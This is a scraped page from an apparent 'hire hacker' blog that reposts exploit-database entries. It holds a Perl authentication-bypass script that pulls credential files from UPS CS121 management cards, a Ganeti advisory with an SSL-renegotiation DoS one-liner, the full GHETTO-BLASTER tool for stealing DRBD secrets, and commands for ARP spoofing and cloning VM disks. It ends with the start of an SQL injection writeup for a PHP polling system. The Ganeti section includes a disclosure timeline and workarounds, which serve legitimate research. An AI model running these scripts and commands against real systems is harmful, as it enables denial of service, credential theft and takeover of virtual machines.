Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863209658

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/67438/info

UPS Web/SNMP-Manager CS121 is prone to an authentication-bypass vulnerability.

Attackers can exploit this issue to bypass authentication mechanism and gain access to the HTTP(s), SNMP or Telnet port service. 

#!/usr/bin/perl -w
use IO::Socket;      
use constant MAXBYTES => scalar 1024;      

$socket = IO::Socket::INET->new( PeerPort  => 4000,
                                 PeerAddr  => $ARGV[0],
                                 Type      => SOCK_DGRAM,
                                 Proto     => 'udp');

$socket->send("<VERSION>");
$socket->recv($inline, MAXBYTES);
print "UPS: $inline \n"; 

$socket->send("show syspar");
$socket->recv($inline, MAXBYTES);
print "$inline\n";

print "Searching login\n" ; 
$socket->send("start");
$socket->recv($inline, MAXBYTES);
$socket->send("cd /flash");
$socket->send("type ftp_accounts.txt"); 

while($socket->recv($inline, MAXBYTES)) { 
	 if($inline =~ /admin/ig) { print $inline; exit;  }
}

sleep(1);
HireHackking 
=begin
## Advisory Information

Title: Ganeti Security Advisory (DoS, Unauthenticated Info Leak)
Advisory URL: https://pierrekim.github.io/advisories/2016-ganeti-0x00.txt
Blog URL: https://pierrekim.github.io/blog/2016-01-05-Ganeti-Info-Leak-DoS.html
Date published: 2016-01-05
Vendors contacted: Google, MITRE
Organization contacted: Riseup
Release mode: Released
CVE: CVE-2015-7944, CVE-2015-7945
CNNVD: no current CNNVD



## Product Description

Ganeti is a virtual machine cluster management tool developed by Google.
The solution stack uses either Xen or KVM as the virtualization
platform, LVM for disk management,
and optionally DRBD for disk replication across physical hosts.



## Vulnerabilities Summary

Ganeti has security problems in the default install (with DRBD) and
the default configuration due to old libraries and design problem,
even if the security level in Ganeti seems to be high.

These problems affect every versions until the last released version.

The Ganeti API Daemon is open on every interface by default and an
attacker can DoS this daemon.

It is also possible to abuse this deamon to retrieve information, such
as network topology, DRBD secrets...

A PoC is provided to automaticaly retrieve sensitive information and
a possible scenario, allowing to take over Virtual Machines remotely,
is provided (which worked in my lab in certain conditions).



## Details - CVE-2015-7944 - Unauthenticated Remote DoS

Ganeti is prone to a SSL DoS with SSL renegociation against the RAPI Daemon:

user@kali:~$ (sleep 1; while true;do echo R;done) | openssl s_client
-connect 10.105.1.200:5080
CONNECTED(00000003)
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
- ---
Certificate chain
 0 s:/CN=ganeti.example.com
   i:/CN=ganeti.example.com
- ---
Server certificate
- -----BEGIN CERTIFICATE-----
[...]
- -----END CERTIFICATE-----
subject=/CN=ganeti.example.com
issuer=/CN=ganeti.example.com
- ---
No client certificate CA names sent
- ---
SSL handshake has read 1003 bytes and written 625 bytes
- ---
New, TLSv1/SSLv3, Cipher is AES256-GCM-SHA384
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : AES256-GCM-SHA384
    Session-ID: D75BCF369143CD008D693B022B967149AF0BD420DE385C51227A1921CD29360D
    Session-ID-ctx:
    Master-Key:
7DDD57FD479AE6555D1D42CF2B15B8857C28430189EC5C1331C75C4253E4A9F0FC0672EE2F2438CD055328C5A46C4F5F
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:
    0000 - 10 ad 69 39 76 6c 2e 37-cf e7 c2 2c 5f f0 e0 20   ..i9vl.7...,_..
    0010 - 5d 85 5a 79 82 20 6a 1d-f1 6e 51 f5 f2 f7 c6 cf   ].Zy. j..nQ.....
    0020 - c1 85 2d 42 5a 1c 53 b4-cb db de 65 04 2a 02 da   ..-BZ.S....e.*..
    0030 - 5c 7d 82 ef 56 4a a4 a1-88 bd 87 fd af 25 e3 2e   \}..VJ.......%..
    0040 - 28 68 04 a4 01 22 88 72-30 0b 79 1c 75 61 88 d5   (h...".r0.y.ua..
    0050 - c9 f3 e2 0b 02 50 bf c8-29 ac d9 36 f3 76 bd 8b   .....P..)..6.v..
    0060 - 05 e0 d3 a9 f3 8b 8b 11-ef 19 2f 94 92 30 94 58   ........../..0.X
    0070 - aa 64 ba 3f a4 fc 15 4b-74 11 3b c3 c7 e7 d4 33   .d.?...Kt.;....3
    0080 - dd 76 e9 e1 1b 3a 95 c4-50 28 4f 9e bc cc cb f3   .v...:..P(O.....
    0090 - bf 4d 60 92 64 00 af 67-c0 e9 69 e3 98 54 21 dc   .M`.d..g..i..T!.

    Start Time: 1438121399
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)
- ---
RENEGOTIATING
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
RENEGOTIATING
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
RENEGOTIATING
depth=0 CN = ganeti.example.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ganeti.example.com
verify return:1
RENEGOTIATING
[...]


- From my test, 1 thread takes 75% of CPU.

  `top` on the main server (10.105.1.200):
  19734 gnt-rapi  20   0  148980  35364   4696 R  76.8  3.7   0:04.12
ganeti-rapi


Multiple threads will eat all the available CPUs and will likely DoS ganeti:

  21280 gnt-rapi  20   0  148980  35364   4696 R  35.3  3.7   0:05.06
ganeti-rapi
  20968 gnt-rapi  20   0  148980  35364   4696 R  33.4  3.7   0:09.92
ganeti-rapi
  20969 gnt-rapi  20   0  148980  35364   4696 R  32.4  3.7   0:09.95
ganeti-rapi
  21282 gnt-rapi  20   0  148980  35364   4696 R  32.4  3.7   0:04.53
ganeti-rapi
  21281 gnt-rapi  20   0  148980  35364   4696 R  31.4  3.7   0:04.78
ganeti-rapi


An attacker can use tools from THC to perform SSL DoS too (openssl was
the fastest solution out of the box):

  https://www.thc.org/thc-ssl-dos/



## Details - CVE-2015-7945 - Unauthenticated Remote Information Disclosure

This vulnerability allows an attacker to retrieve data using
information disclosure,
allowing him, depending on the configuration, to remotely hack VMs.
A PoC (GHETTO-BLASTER which works in Linux (Debian, Kali) and FreeBSD)
is provided as a base64-encoded file to this email.
This PoC is also available here:
https://pierrekim.github.io/advisories/GHETTO-BLASTER.


I. Design Security Problem with the RAPI Daemon

In the Ganeti master node, when using /usr/sbin/gnt-network, a
non-root user can't get information (debian-01 is the ganeti master
node):

  user@debian-01:~$ /usr/sbin/gnt-network list
  It seems you don't have permissions to connect to the master daemon.
  Please retry as a different user.
  user@debian-01:~$

This is common for all gnt-tools and seems to be a security design.

It appears Genati by default is too open when using the RAPI daemon
and this daemon listens on every interface by default.
For example, the network configuration can be extracted from jobs
using the RAPI daemon without authentication.

I wrote a tool, "GHETTO-BLASTER", to industrialize the process:

  user@kali:~$ ./GHETTO-BLASTER http://<ip_of_ganeti_rapi>

  Example:
    https://<ip>

  2015 Pierre Kim <pierre.kim.sec@gmail.com>
       @PierreKimSec https://pierrekim.github.io
  DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
<http://www.wtfpl.net/txt/copying/>
  user@kali:~$ ./GHETTO-BLASTER http://10.105.1.200
  [...]
  [a lot of output]
  [...]
  user@kali:~$ ls -l 2-networks  2-networks-test-priv 2-networks-test-pub
  -rw-r--r-- 1 user user 228 Jun 20 13:37 2-networks
  -rw-r--r-- 1 user user 882 Jun 20 13:37 2-networks-test-priv
  -rw-r--r-- 1 user user 881 Jun 20 13:37 2-networks-test-pub
  user@kali:~$ cat 2-networks  2-networks-test-priv 2-networks-test-pub
$VAR1 = [
          {
            'name' => 'test-priv',
            'uri' => '/2/networks/test-priv'
          },
          {
            'uri' => '/2/networks/test-pub',
            'name' => 'test-pub'
          }
        ];
$VAR1 = {
          'mtime' => '1333027652.67126',
          'gateway' => undef,
          'network6' => undef,
          'inst_list' => [],
          'mac_prefix' => undef,
          'serial_no' => 1,
          'free_count' => 254,
          'name' => 'test-priv',
          'map' =>
'X..............................................................................................................................................................................................................................................................X',
          'gateway6' => undef,
          'external_reservations' => '192.168.1.0, 192.168.1.255',
          'uuid' => '506ad97b-2276-43f4-ae27-e6bbb97f28ff',
          'ctime' => '1333027652.67126',
          'reserved_count' => 2,
          'network' => '192.168.1.0/24',
          'group_list' => [],
          'tags' => []
        };
$VAR1 = {
          'mac_prefix' => undef,
          'inst_list' => [],
          'network6' => undef,
          'mtime' => '1333027641.64375',
          'gateway' => undef,
          'map' =>
'X..............................................................................................................................................................................................................................................................X',
          'free_count' => 254,
          'name' => 'test-pub',
          'serial_no' => 1,
          'reserved_count' => 2,
          'network' => '192.168.0.0/24',
          'ctime' => '1333027641.64375',
          'gateway6' => undef,
          'uuid' => '48b34199-2d23-46f0-b4aa-2539cb4a7780',
          'external_reservations' => '192.168.0.0, 192.168.0.255',
          'group_list' => [],
          'tags' => []
        };
user@kali:~$


It's possible to map the network and to retrieve sensible secrets.

Other interesting information:

osparams_secret is readable in jobs using the access to RAPI.


II. Using this information disclosure to hack VMs:

By default, /var/lib/ganeti/config.data(640, gnt-masterd:gnt-confd)
contains the secret key for DRBD replication.
A remote user or even a local non-root (or non gnt-masterd user) can't
get the configuration of DRBD.

This key can be extracted from jobs by abusing the RAPI daemon without
authentication.

After running GHETTO-BLASTER, you will have a lot of files:

user@kali:~$ ls
1-list-collectors                        2-jobs-121  2-jobs-154
2-jobs-187  2-jobs-219  2-jobs-251  2-jobs-284  2-jobs-47  2-jobs-8
1-report-all                             2-jobs-122  2-jobs-155
2-jobs-188  2-jobs-22   2-jobs-252  2-jobs-285  2-jobs-48  2-jobs-80
2-features                               2-jobs-123  2-jobs-156
2-jobs-189  2-jobs-220  2-jobs-253  2-jobs-286  2-jobs-49  2-jobs-81
2-info                                   2-jobs-124  2-jobs-157
2-jobs-19   2-jobs-221  2-jobs-254  2-jobs-287  2-jobs-5   2-jobs-82
2-instances                              2-jobs-125  2-jobs-158
2-jobs-190  2-jobs-222  2-jobs-255  2-jobs-288  2-jobs-50  2-jobs-83
2-instances-vm-01                        2-jobs-126  2-jobs-159
2-jobs-191  2-jobs-223  2-jobs-256  2-jobs-289  2-jobs-51  2-jobs-84
2-instances-vm-01-info-jobs              2-jobs-127  2-jobs-16
2-jobs-192  2-jobs-224  2-jobs-257  2-jobs-29   2-jobs-52  2-jobs-85
2-instances-vm-02.example.com            2-jobs-128  2-jobs-160
2-jobs-193  2-jobs-225  2-jobs-258  2-jobs-290  2-jobs-53  2-jobs-86
2-instances-vm-02.example.com-info-jobs  2-jobs-129  2-jobs-161
2-jobs-194  2-jobs-226  2-jobs-259  2-jobs-291  2-jobs-54  2-jobs-87
2-jobs                                   2-jobs-13   2-jobs-162
2-jobs-195  2-jobs-227  2-jobs-26   2-jobs-292  2-jobs-55  2-jobs-88
2-jobs-0                                 2-jobs-130  2-jobs-163
2-jobs-196  2-jobs-228  2-jobs-260  2-jobs-293  2-jobs-56  2-jobs-89
2-jobs-1                                 2-jobs-131  2-jobs-164
2-jobs-197  2-jobs-229  2-jobs-261  2-jobs-294  2-jobs-57  2-jobs-9
2-jobs-10                                2-jobs-132  2-jobs-165
2-jobs-198  2-jobs-23   2-jobs-262  2-jobs-295  2-jobs-58  2-jobs-90
2-jobs-100                               2-jobs-133  2-jobs-166
2-jobs-199  2-jobs-230  2-jobs-263  2-jobs-296  2-jobs-59  2-jobs-91
2-jobs-101                               2-jobs-134  2-jobs-167
2-jobs-2    2-jobs-231  2-jobs-264  2-jobs-297  2-jobs-6   2-jobs-92
2-jobs-102                               2-jobs-135  2-jobs-168
2-jobs-20   2-jobs-232  2-jobs-265  2-jobs-298  2-jobs-60  2-jobs-93
2-jobs-103                               2-jobs-136  2-jobs-169
2-jobs-200  2-jobs-233  2-jobs-266  2-jobs-299  2-jobs-61  2-jobs-94
2-jobs-104                               2-jobs-137  2-jobs-17
2-jobs-201  2-jobs-234  2-jobs-267  2-jobs-3    2-jobs-62  2-jobs-95
2-jobs-105                               2-jobs-138  2-jobs-170
2-jobs-202  2-jobs-235  2-jobs-268  2-jobs-30   2-jobs-63  2-jobs-96
2-jobs-106                               2-jobs-139  2-jobs-171
2-jobs-203  2-jobs-236  2-jobs-269  2-jobs-31   2-jobs-64  2-jobs-97
2-jobs-107                               2-jobs-14   2-jobs-172
2-jobs-204  2-jobs-237  2-jobs-27   2-jobs-32   2-jobs-65  2-jobs-98
2-jobs-108                               2-jobs-140  2-jobs-173
2-jobs-205  2-jobs-238  2-jobs-270  2-jobs-33   2-jobs-66  2-jobs-99
2-jobs-109                               2-jobs-141  2-jobs-174
2-jobs-206  2-jobs-239  2-jobs-271  2-jobs-34   2-jobs-67  2-networks
2-jobs-11                                2-jobs-142  2-jobs-175
2-jobs-207  2-jobs-24   2-jobs-272  2-jobs-35   2-jobs-68  2-nodes
2-jobs-110                               2-jobs-143  2-jobs-176
2-jobs-208  2-jobs-240  2-jobs-273  2-jobs-36   2-jobs-69
2-nodes-debian-01
2-jobs-111                               2-jobs-144  2-jobs-177
2-jobs-209  2-jobs-241  2-jobs-274  2-jobs-37   2-jobs-7
2-nodes-debian-01-role
2-jobs-112                               2-jobs-145  2-jobs-178
2-jobs-21   2-jobs-242  2-jobs-275  2-jobs-38   2-jobs-70
2-nodes-debian-02
2-jobs-113                               2-jobs-146  2-jobs-179
2-jobs-210  2-jobs-243  2-jobs-276  2-jobs-39   2-jobs-71
2-nodes-debian-02-role
2-jobs-114                               2-jobs-147  2-jobs-18
2-jobs-211  2-jobs-244  2-jobs-277  2-jobs-4    2-jobs-72  2-os
2-jobs-115                               2-jobs-148  2-jobs-180
2-jobs-212  2-jobs-245  2-jobs-278  2-jobs-40   2-jobs-73  version
2-jobs-116                               2-jobs-149  2-jobs-181
2-jobs-213  2-jobs-246  2-jobs-279  2-jobs-41   2-jobs-74
2-jobs-117                               2-jobs-15   2-jobs-182
2-jobs-214  2-jobs-247  2-jobs-28   2-jobs-42   2-jobs-75
2-jobs-118                               2-jobs-150  2-jobs-183
2-jobs-215  2-jobs-248  2-jobs-280  2-jobs-43   2-jobs-76
2-jobs-119                               2-jobs-151  2-jobs-184
2-jobs-216  2-jobs-249  2-jobs-281  2-jobs-44   2-jobs-77
2-jobs-12                                2-jobs-152  2-jobs-185
2-jobs-217  2-jobs-25   2-jobs-282  2-jobs-45   2-jobs-78
2-jobs-120                               2-jobs-153  2-jobs-186
2-jobs-218  2-jobs-250  2-jobs-283  2-jobs-46   2-jobs-79


Files contain DRBD secrets:

user@kali:~$ grep secret *|tail -n 5
2-jobs-80:
                        'secret' =>
'eb1fe92b20aef58ed0570df49a38f82cf5a72d06'
2-jobs-82:
            'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06'
2-jobs-84:
            'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
2-jobs-85:
            'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
2-jobs-86:
            'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
user@kali:~$



The key is confirmed by using `drbdsetup show` as root in the Ganeti
master node:

root@debian-01:~# drbdsetup show
resource resource0 {
    options {
    }
    net {
        cram-hmac-alg           "md5";
        shared-secret           "eb1fe92b20aef58ed0570df49a38f82cf5a72d06";
        after-sb-0pri           discard-zero-changes;
        after-sb-1pri           consensus;
    }
    _remote_host {
        address                 ipv4 10.105.1.201:11000;
    }
    _this_host {
        address                 ipv4 10.105.1.200:11000;
        volume 0 {
            device                      minor 0;
            disk
"/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_data";
            meta-disk
"/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_meta";
            disk {
                size                    8388608s; # bytes
                resync-rate             61440k; # bytes/second
            }
        }
    }
}
root@debian-01:~#


By digging more, one of the jobs file (2-jobs-280) contains the DRDB
configuration:

[...]

      'drbd_info' => {
                       'port' => 11000,
                       'primary_minor' => 0,
                       'secondary_node' => 'debian-02',
                       'secondary_minor' => 0,
                       'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06',
                       'primary_node' => 'debian-01'
                     },
[...]



As stated in http://docs.ganeti.org/ganeti/current/html/security.html:

  DRBD connections are protected from erroneous connections to other
machines (as may happen due to software issues), and
  from accepting connections from other machines, by using a shared
secret, exchanged via RPC requests from the master to the nodes when
configuring the device.


We recovered the secret of DRBD, the port used and the nodes without
authentication.
Other files contain the LVM VG and the LVM LG names! It's enough to
start playing with DRDB from an attacker side.



III. DRBD Madness

Now, it's time for DRBD Feng Shui!

Getting the File System of a VM:

o By doing ARP spoofing in the same LAN:

We will impersonate 10.105.1.201 by doing ARP poisoning and using a
valid drbd.conf thank to the parameters provided by the RAPI daemon:

root@kali# cat etc-drbd.conf

include "drbd.d/global_common.conf";
include "drbd.d/*.res";

resource resource0 {
    volume 0 {
       device minor 0;
       disk
"/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_data";
       meta-disk
"/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_meta";
    }
    protocol C;
    net {
        cram-hmac-alg           "md5";
        shared-secret           "eb1fe92b20aef58ed0570df49a38f82cf5a72d06";
        after-sb-0pri           discard-zero-changes;
        after-sb-1pri           consensus;
    }
    on target {
        address    10.105.1.200:11000;
    }
    on kali {
        address    10.105.1.201:11000;
    }
}

root@kali# vgremove xenvg-vg 2>/dev/null
root@kali# dd if=/dev/zero of=/dev/sdb bs=1024 count=1024
root@kali# pvcreate /dev/sdb
root@kali# vgcreate xenvg-vg /dev/sdb
root@kali# lvcreate --name
41975138-516e-4f8d-9c39-f6716a89efa2.disk0_data --size 4G xenvg-vg
root@kali# lvcreate --name
41975138-516e-4f8d-9c39-f6716a89efa2.disk0_meta --size 128M xenvg-vg
root@kali# cp etc-drbd.conf /etc/drbd.conf
root@kali# drbdadm create-md resource0
root@kali# drbdadm up resource0

<ARP poisoning> || root@kali# ifconfig eth0 10.105.1.201 netmask 255.255.255.0

root@kali# drbdadm attach resource0
root@kali# drbdadm connect resource0
root@kali# cat /proc/drbd
version: 8.4.3 (api:1/proto:86-101)
srcversion: 1A9F77B1CA5FF92235C2213
 0: cs:SyncTarget ro:Secondary/Primary ds:Inconsistent/UpToDate C r-----
    ns:0 nr:916568 dw:916472 dr:0 al:0 bm:55 lo:2 pe:0 ua:2 ap:0 ep:1
wo:f oos:3277832
        [===>................] sync'ed: 22.0% (3277832/4194304)K
        finish: 0:08:33 speed: 6,368 (5,912) want: 4,520 K/sec
root@kali# echo "wow synchronisation in progress !"
wow synchronisation in progress !
root@kali#

After 10min of synchronisation, an attacker will have a perfect copy
of the targeted VM File System using DRDB replication.

It's also possible to write information in the File System (like
adding SSH keys).
Rooting VMs by adding ssh keys and by doing s/PermitRootLogin
No/PermitRootLogin Yes/ is left as a exercise to the reader.


o Other methods of MiTM exist and are left as a exercise for the reader.



## Proposed Workarounds by the Security Researcher

At first, I think these steps must be done to improve the security of ganeti:

1/ Forcing the RAPI to listen to 127.0.0.1 instead of 0.0.0.0.

  This can be done by adding by default to /etc/default/ganeti:

  RAPI_ARGS="-b 127.0.0.1"

  Listening to 127.0.0.1 for ganeti-mond is a good step too (it
listens to 0.0.0.0:1815/tcp)


2/ Adding an authentication by default for the RAPI daemon (not only
for writing access but for reading access too)


3/ Filtering the output of the jobs to avoid leaking secrets.

  Note that the immediate step is to change the secrets used for DRBD and
  to be sure nobody had access to the DRBD blocks, allowing a
compromise of all the VMs.

4/ Disabling SSL renegociation and updating the default ciphers.


A personal note: as deploying a working Ganeti platform is very complicated,
attackers will likely giving up before having a working Ganeti
platform to study :)



## Vendor Response

Update to the latest version of Ganeti.

Read details about mitigation measures here:
https://groups.google.com/forum/#!topic/ganeti/9bLyzwmmvdg



## Report Timeline

 * Jul 30, 2015 : Pierre Kim sends an email to security@ganeti.org
asking for a GPG key, email bounced
 * Jul 30, 2015 : Pierre Kim asks Google Security Team if Ganeti is
elligible to the Google Vulnerability Reward Program
 * Jul 30, 2015 : Pierre Kim sends an email to Ganeti Team for a
working security contact
 * Jul 30, 2015 : Guido Trotter replies by saying to use
opensource-ganeti@google.com
 * Aug 1, 2015: Security@google.com confirms it's out of scope
 * Aug 4, 2015: Pierre Kim says the exploits are critical and Ganeti
is widely used by Google
 * Aug 11, 2015: Advisories and PoC sent to Google Security Team and
Pierre Kim asks Google Security Team to contact Riseup, as they are
using Ganeti
 * Aug 12, 2015: Google Security Team transmitted the information to Ganeti Team
 * Aug 20, 2015: Google Security Team is working on the scope and the
impact of the report
 * Aug 27, 2015: Google Security Team decided is not within scope of
the VRP program but a research grant is awarded as "Security
improvement efficacy research"
 * Aug 28, 2015: Pierre Kims provides information about DRBDv8,
DRBDv9. Pierre Kim asks information about the DoS, the condition for
the rewards and asks if Riseup was contacted
 * Sep 10, 2015: Google Security Team confirms they will not contact
Riseup and that they ask "that you act and communicate in good faith,
use your own best judgement, and we'll do everything we can to work
with you to resolve vulnerabilities in a reasonable timeframe"
 * Oct 6, 2015: Pierre Kim asks for update about the security patchs
and informs he will contact Riseup
 * Oct 6, 2015: Riseup is contacted
 * Oct 16, 2015: Google Security Team confirm releases end of October
and asks about CVEs from MITRE. The Ganeti Bug #1135 is created
 * Oct 17, 2015: Pierre Kim asks Google to ask MITRE CVE assignments
and proposes to contact CNNVD to get a CNNVD entry
 * Oct 17, 2015: Google Security Team contacted MITRE to get CVEs
 * Oct 23, 2015: Google Security Team has 2 CVE: CVE-2015-7944 and CVE-2015-7945
 * Nov 3, 2015: Pierre Kim informs new security with a DoS with the
jobs creation
 * Nov 5, 2015: Ganeti Team has rate-limit to 20 concurrent jobs
creation, which limit the problems and declares the patch will be very
soon
 * Nov 17, 2015: Ganeti Team announces new releases next week
 * Nov 23, 2015: a pre-advisory is sent to Ganeti Team and Google Security Team
 * Dec 30, 2015: Ganeti Team releases a security advisory
 * Jan 05, 2015: A public advisory is sent to security mailing lists



## Credit

These vulnerabilities were found by Pierre Kim (@PierreKimSec).



## Greetings

Big thanks to my friends Alexandre Torres, Jordan, Jerome and Stephen.

Thanks to Google Security Team which coordinated the issues by
contacting MITRE and the different parties.



## References

https://pierrekim.github.io/advisories/2016-ganeti-0x00.txt
https://pierrekim.github.io/blog/2016-01-05-Ganeti-Info-Leak-DoS.html
http://www.ocert.org/advisories/ocert-2015-012.html
https://groups.google.com/forum/#!topic/ganeti/9bLyzwmmvdg



## PoC - GHETTO-BLASTER
=end

#!/usr/bin/perl -w

use LWP::UserAgent;
use JSON;
use Data::Dumper;
use strict;
use warnings;

my $i_want_readable_json = 1;

if (!(defined($ARGV[0])))
{
  print "$0 http://<ip_of_ganeti_rapi>\n\n";
  print "  Example:\n";
  print "    https://<ip>\n";
} else {
  print "GHETTO-BLASTER - a Ganeti data agregation tool\n";
}
print "\n";
print "  2015 Pierre Kim <pierre.kim.sec\@gmail.com>\n";
print "       \@PierreKimSec https://pierrekim.github.io/\n";
print "  DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE <http://www.wtfpl.net/txt/copying/>\n\n";
exit (1) if (!(defined($ARGV[0])));

my $base_url          = $ARGV[0];
my $default_rapi_port = 5080;
my $default_mond_port = 1815;

my %basic_cmds = (
  "info" =>     { "url" => "/2/info",     "output_file" => "2-info",      "is_json" => 1 },
  "version" =>  { "url" => "/version",    "output_file" => "version",     "is_json" => 0 },
  "features" => { "url" => "/2/features", "output_file" => "2-features",  "is_json" => 1 },
  "os" =>       { "url" => "/2/os",       "output_file" => "2-os",        "is_json" => 0 }
);

$ENV{PERL_LWP_SSL_VERIFY_HOSTNAME} = 0;



# FIXME:
# /2/filters
# /2/filters?bulk=1
# /2/groups/tags
# /2/instances/[instance_name]/tags
# /2/nodes/tags
# /2/tags
# /2/networks/[network_name]/tags
#

# TO TEST:
# /2/groups/[group_name]
# /2/networks/[network_name]


&main();


sub main()
{
  &greetings("You are being visited by GHETTO-BLASTER a Ganeti data agregation tool");

  for my $cmd (keys %basic_cmds)
  {
    my $res = &get_target($base_url . ":" . $default_rapi_port . $basic_cmds{$cmd}->{"url"});
    &save_data_leak($res, $basic_cmds{$cmd}->{"output_file"}, $basic_cmds{$cmd}->{"is_json"});
  }

  &parse_instances();
  &parse_networks();
  &parse_groups();
  &parse_nodes();
  &parse_mond();
  &parse_jobs();
  &greetings("Thank you for using Ganeti and have a nice day!");
}


sub greetings()
{
  my $msg = $_[0];

  $msg =~ s/ /_/g;
  print "Sending Banner to the remote API Daemon: $msg\n";
  my $res = &get_target($base_url . ":" . $default_rapi_port . "/" . $msg, 1);
}


sub parse_mond()
{
  my $res;
  my $base_url_http = $base_url;

  $base_url_http =~ s/https/http/;
  
  $res = &get_target($base_url_http . ":" . $default_mond_port . "/1/list/collectors");
  &save_data_leak($res, "1-list-collectors", 0);
  $res = &get_target($base_url_http . ":" . $default_mond_port . "/1/report/all");
  &save_data_leak($res, "1-report-all", 0);
}


sub parse_instances()
{
  my $res = &get_target($base_url . ":" . $default_rapi_port . "/2/instances");

  my $decoded_json = JSON::decode_json($res);

  &save_data_leak($res, "2-instances", 1);

  foreach my $data (@{$decoded_json})
  {
    $res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'});
    &save_data_leak($res, "2-instances-$data->{'id'}", 1, $data->{'id'});

    $res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'} . "/info");
    print "Sleep (10) because job is in progress ...\n";
    sleep 10; # we need to sleep(10) when asking the instances/info due to the creation of a job
    $res = &get_target($base_url . ":" . $default_rapi_port . "/2/jobs/" . $res);
    &save_data_leak($res, "2-instances-$data->{'id'}-info-jobs", 1, "2/instances/$data->{'id'}/info-jobs");
  }
}


sub parse_networks()
{
  my $res = &get_target($base_url . ":" . $default_rapi_port . "/2/networks");

  my $decoded_json = JSON::decode_json($res);

  &save_data_leak($res, "2-networks", 1);

  foreach my $data (@{$decoded_json})
  {
    $res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'});
    &save_data_leak($res, "2-networks-$data->{'name'}", 1, $data->{'uri'});
  }
}


sub parse_groups()
{
  my $res = &get_target($base_url . ":" . $default_rapi_port . "/2/groups");

  my $decoded_json = JSON::decode_json($res);

  &save_data_leak($res, "2-groups", 1);

  foreach my $data (@{$decoded_json})
  {
    $res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'});
    &save_data_leak($res, "2-groups-$data->{'name'}", 1, $data->{'uri'});
  }
}


sub parse_nodes()
{
  my $res = &get_target($base_url . ":" . $default_rapi_port . "/2/nodes");

  my $decoded_json = JSON::decode_json($res);

  &save_data_leak($res, "2-nodes", 1);

  foreach my $data (@{$decoded_json})
  {
    $res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'});
    &save_data_leak($res, "2-nodes-$data->{'id'}", 1, $data->{'id'});

    $res = &get_target($base_url . ":" . $default_rapi_port . $data->{'uri'} . "/role");
    &save_data_leak($res, "2-nodes-$data->{'id'}-role", 0, "nodes/$data->{'id'}-role");
  }
}


sub parse_jobs()
{
  my $total_jobs = 0;
  my $res = &get_target($base_url . ":" . $default_rapi_port . "/2/jobs");

  my $decoded_json = JSON::decode_json($res);

  &save_data_leak($res, "2-jobs", 1);

  foreach my $data (@{$decoded_json})
  {
    $total_jobs = $data->{'id'} if ($data->{'id'} > $total_jobs);
  }

  for my $i (0 .. $total_jobs)
  {
    $res = &get_target($base_url . ":" . $default_rapi_port . "/2/jobs/" . $i);
    &save_data_leak($res, "2-jobs-$i", 1);
  }
}


sub save_data_leak()
{
  my $input = $_[0];
  my $output_file = $_[1];
  my $is_json = $_[2];
  my $stdout = $_[3] || $output_file;
  my $json;

  print "Parsing $stdout ... saving to $output_file\n";
  $input = Dumper(JSON::decode_json($input)) if ($i_want_readable_json && $is_json);
  open (FILE, ">", "$output_file");
  print FILE ($input);
  close (FILE);
}


sub get_target()
{
  my $target = $_[0];
  my $error_ok = $_[1];
  my ($ua, $res, $req);

  $ua = LWP::UserAgent->new(
    ssl_opts => { verify_hostname => 0, SSL_verify_mode => 0 }
  );
  $ua->agent("Ganeti/2.12");
  $ua->env_proxy;
  $ua->timeout(10);
  $req = new HTTP::Request GET => $target;
  $res = $ua->request($req);

  print "Error when requesting $target\n" if (!$res->is_success && !$error_ok);

  return ($res->content);
}


=begin
## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/


-- 
Pierre Kim
pierre.kim.sec@gmail.com
@PierreKimSec
=end
HireHackking 
Exploit Title	: Multiple Vulnerabilities in Simple PHP Polling System.
Author			: WICS
Date 			: 05-Jan-2016
Software Link	: http://sourceforge.net/projects/pollingsystem/


# Overview : 
Simple PHP Polling System helps organizations to make polls of different types of positions with a number of candidates under each position.
This vulnerable package ha 5869+ downlaods till the date.
Multiple vulnerabilities ( SQL insertion injection, Persistent Cross Site Scripting, Password Reset. )

1. SQL injection : Sql injetion  exist in following pages : 
   --------------
a) manage-profile.php : In manage-profile.php there is no filteration or validation for user supplied data, on parameter  " $_POST['email'] 
line no.33 -> $myEmail = $_POST['email'];
...
...
...
line no 38 -> $sql = mysql_query( "UPDATE tbMembers SET first_name='$myFirstName', last_name='$myLastName', email='$myEmail', password='$newpass' WHERE member_id = '$myId'" )  or die( mysql_error() );

an attacker can inject post parameter email to perform SQL Injecton attack.


